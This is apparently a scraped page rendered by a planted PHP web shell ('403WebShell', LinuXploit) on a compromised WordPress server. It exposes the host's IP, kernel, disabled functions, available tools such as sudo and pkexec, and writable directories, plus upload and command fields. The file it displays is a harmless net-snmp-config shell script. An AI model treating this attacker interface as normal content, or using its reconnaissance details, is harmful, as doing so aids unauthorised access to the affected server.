Warning: include_once(/home/freelife/public_html/wp-content/plugins/wp-super-cache/wp-cache-phase1.php): failed to open stream: No such file or directory in /home/freelife/public_html/wp-content/advanced-cache.php on line 22

Warning: include_once(): Failed opening '/home/freelife/public_html/wp-content/plugins/wp-super-cache/wp-cache-phase1.php' for inclusion (include_path='.:') in /home/freelife/public_html/wp-content/advanced-cache.php on line 22
403WebShell
403Webshell
Server IP : 176.9.105.210  /  Your IP : 216.73.217.21
Web Server : Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System : Linux server.mediaphic.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : freelife ( 1356)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system,show_source,mail,sendmail,popen,symlink,phpinfo
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/bin/net-snmp-config
#!/bin/sh
#
# net-snmp-config
#
# this shell script is designed to merely dump the configuration
# information about how the net-snmp package was compiled.  The
# information is particularily useful for applications that need to
# link against the net-snmp libraries and hence must know about any
# other libraries that must be linked in as well.

# this particular shell script calls arch specific script to avoid
# multilib conflicts

# Supported arches ix86 ia64 ppc ppc64 s390 s390x x86_64 alpha sparc sparc64

arch=`arch`
echo $arch | grep -q i.86
if [ $? -eq 0 ] ; then
    net-snmp-config-i386 $*
    exit 0
fi
if [ "$arch" = "ia64" ] ; then
    net-snmp-config-ia64 $*
    exit 0
fi
if [ "$arch" = "ppc" ] ; then
    net-snmp-config-ppc $*
    exit 0
fi
if [ "$arch" = "ppc64" ] ; then
    net-snmp-config-ppc64 $*
    exit 0
fi
if [ "$arch" = "s390" ] ; then
    net-snmp-config-s390 $*
    exit 0
fi
if [ "$arch" = "s390x" ] ; then
    net-snmp-config-s390x $*
    exit 0
fi
if [ "$arch" = "x86_64" ] ; then
    net-snmp-config-x86_64 $*
    exit 0
fi
if [ "$arch" = "alpha" ] ; then
    net-snmp-config-alpha $*
    exit 0
fi
if [ "$arch" = "sparc" ] ; then
    net-snmp-config-sparc $*
    exit 0
fi
if [ "$arch" = "sparc64" ] ; then
    net-snmp-config-sparc64 $*
    exit 0
fi
echo "Cannot determine architecture"

Youez - 2016 - github.com/yon3zu
LinuXploit